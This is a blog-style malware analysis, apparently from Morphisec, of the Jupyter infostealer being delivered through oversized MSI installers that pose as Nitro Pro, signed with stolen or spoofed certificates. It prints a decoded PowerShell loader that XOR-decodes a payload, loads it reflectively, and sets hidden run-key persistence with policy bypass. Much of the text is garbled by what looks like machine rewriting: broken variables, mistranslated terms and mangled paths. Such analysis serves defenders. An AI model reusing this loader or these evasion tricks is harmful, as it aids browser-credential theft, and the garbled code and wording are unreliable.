New Jupyter Evasive delivery via MSI installer

DevOps experience


In 2020, Morphisec introduced the Jupyter infostealer, a .NET attack that primarily targets Chromium, Firefox, and Chrome browser data while retaining the added capabilities of a backdoor.

Since then, Jupyter has remained active and very evasive. It continued to receive very weak to zero detections in the VirusTotal database, maintaining the ability to bypass detection solutions.

Then, on September 8, 2021, we identified a new delivery chain within Jupyter that is going under the radar of security solutions. Following this discovery, the Morphisec Labs team was made aware of several high-level targets threatened by the Jupyter infostealer. We are currently studying the scope of the campaign.

The following blog post describes the new distribution chain, showing how threat actors continue to scale up their attacks to become more effective and evasive.

Technical presentation

Jupyter attack stream 20-09-2021

Figure 1: The attack flow of the new Jupyter infostealer

MSI payload

In this section, we’ll take a brief look at some of the payload’s shared attributes so that we get an overview of what metrics to expect. This is based on the four variants that we have observed.

Payload size and name

Like previous Jupyter payloads, MSI payloads are consistently larger than 100MB in size. This allows the payload to thwart inline AV scanners.

The payload naming convention is:

  • Potential document topics
  • Words are separated by a dash ‘-‘
  • Each word begins with a capital letter

Examples can be found in the IOC section under the title “MSI Payload Names”.

MSI third-party installation wizard

The payloads were generated with a trial version of Advanced installer (version 18.6.1 build 2c9a75c6).

As described on their website, the Advanced Installation Wizard is an “all-in-one” application packaging tool. By using this tool, threat actors have access to easy implementation of obscured script executions.

The attribution can be found either in the properties of the file (OLE Compound) or in the properties table of the installer.

Figure 2: OLE Compound File Information

Figure 2: OLE Compound File Information

The properties table

Figure 3: Properties table

Decoy installation executable

As shown in Figure 1 above, all observed variants are described as Nitro Pro 13. Once the victim runs the MSI payload, they run a legitimate installation binary of Nitro Pro 13. The correlation of this attribution with the variant filenames suggests that the delivery method disguises it as PDF.

An image of the installation of Nitro Pro 13

Figure 4: Installing Nitro Pro 13

While all of the variants are described as Nitro, one of them actually contains SumatraPDF instead of.

An installer for Sumatra PDF

Figure 5: Installing Sumatra PDF

Digital signature

Two of the variants are signed with a (currently) valid certificate named ‘SP ZOO TACHOPARTS‘.

The Tachoparts certificate which has probably been stolen or spoofed

Figure 6: Tachoparts certificate

Based on the following certificate data, we can assume that the threat author has impersonated the certificate or stole it from a legitimate company in Poland.


Figure 7: Tachoparts commercial information from Google

Another variant was signed with a revoked certificate named ‘OOO system‘.

The OOO Sistema certificate which has probably been stolen or spoofed

Figure 8: OOO Sistema certificate

As with the previous certificate, this one also correlates to a legitimate business. It was also likely an identity theft or theft in the company.

OOO Sistema certificate

Figure 9: Google OOO Sistema commercial information

Running PowerShell

The initial suspect flag visible in dynamic analysis is the PowerShell command line generated by msiexec.exe.

Command line

C: WindowsSysWOW64WindowsPowerShellv1.0powershell.exe -NoProfile -Not interactive
– Bypass of the execution policy

-File ‘C: UsersAppDataLocalTemppssEA35.ps1 ‘
-propFile ‘C: UsersAppDataLocalTempmsiEA13.txt ‘
-scriptFile ‘C: UsersAppDataLocalTempscrEA14.ps1 ‘
-scriptArgsFile ‘C: UsersAppDataLocalTempscrEA15.txt ‘
-propSep ‘:: ‘
-testPrefix ‘_testValue.’

Code block 1: CMD Shell command line

This command line is generated by a feature in the Advanced installer which is designed for run PowerShell loader as “CustomAction” attribute defined in MSI installers.

The file names in the settings differ between the variants but keep the same pattern. For example in ‘scrEA14.ps1‘, EA14 is represented by four hexadecimal characters. These four characters are different between payload variants.


Figure 9: PowerShell loader integrated into CustomAction in AdvancedInstaller

Jupyter PowerShell Charger

The PowerShell file in the – Script file The parameter shown in code block 1 represents the Jupyter PowerShell loader.

This loader is very similar to previous Jupyter loaders in that it keeps a very elusive file with low detections to 0 on VirusTotal, which is rare for a full PowerShell loader (loader code with a built-in payload).

While Jupyter chargers are covered extensively in our blog and others, the new variant shares the same code pattern. The following code block is an example of an unobtrusive and embellished version of it:

$ b64_enc_payload = ‘deduced’;

$ random_path_str = jeiJBgXRTuVfsm;
$ payload_directory_path = $ ENV: APPDATAMicrosoft “ + $ random_path_str;
$ enc_payload_path = $ payload_directory_path + + $ random_path_str + ‘.’ +
$ random_path_str;
[System.IO.File]::WriteAllBytes($ enc_payload_path,
[System.Convert]::DeBase64String($ b64_enc_payload));

$ decode_and_execute_payload_script = ‘under the code embedded in the comment’
$ xor_key = “inferred base64 key”;
$ b64_enc_payload = [System.IO.File]:: ReadAllBytes ($ enc_payload_path);
For ($ i = 0; $ i -lt $ b64_enc_payload.Count;) {
For ($ y = 0; $ y -lt $ xor_key.Length; $ y ++) {
$ b64_enc_payload[$i]= $ b64_enc_payload[$i] -bxor $ xor_key[$y];
$ i ++;
if ($ i -ge $ b64_enc_payload.Count) {
$ y = $ xor_key.Length
[System.Reflection.Assembly]:: Load ($ b64_enc_payload); // Load the ‘interact’ method

Create_Registry_Key -reg_path () -execution_command (‘Powershell -WindowStyle
Hidden -ep Bypass -Command ”+ $ decode_and_execute_payload_script ‘);
Create_Registry_Key -reg_path () -execution_command $ random_path_str.To lower();

$ lnk_object = New-Object -ComObject WScript.Shell.Create shortcut($ ENV: APPDATA +
$ lnk_object.Target Path = $ payload_directory_path + + $ random_path_str;
$ lnk_object.Window Style = 7;
$ safeguard();

IEX $ decode_and_execute_payload_script;

Code block 2: Jupyter PowerShell charger unclogged

Note that like previous versions, this one also reflexively loads a DLL that initializes execution under the Deimos namespace in the Mars class (Mars.Deimos).

The payload of the .NET DLL

In our previous blog, we attributed the payloads to their internal version. The following table correlates the observed internal version and the earliest submission date of the MSI payload to the detections on VirusTotal.

Internal version of the Jupyter DLL

VirusTotal first submission


September 08, 2021
1/57 Malicious detections


September 08, 2021

2/57 Malicious detections


September 10, 2021
0/57 Malicious detections


September 13, 2021
0/57 Malicious detections

Although all .NET DLL payloads should be hidden, it appears that the SP-10 variant contains source code strings. The following figure shows the payload methods and class names.



The evolution of the Jupyter infostealer / backdoor since we first identified it in 2020 proves the truth of the claim that threat actors are always innovating. The fact that this attack continues to have little or no detections on VirusTotal further indicates the ease with which threat actors evade detection-based solutions. It is clear that a new approach is needed for threat prevention, as it is likely that these evasive attacks will continue.

This is why Morphisec has designed its solutions to focus on deterministic prevention of evasive attacks rather than detection. Customers who operate the Morphisec breach prevention platform on their endpoints, on-premise servers, and in the cloud can rest assured that they are protected against evasive threats such as the Jupyter infostealer, regardless of detection rate. in VirusTotal.

Book a demo of Morphisec Guard


MSI payload hashes


AdvancedInstall PowerShell Hash


Jupyter PowerShell Loader Hashes




Jupyter payloads







MSI payload names


Source link


About Author

Leave A Reply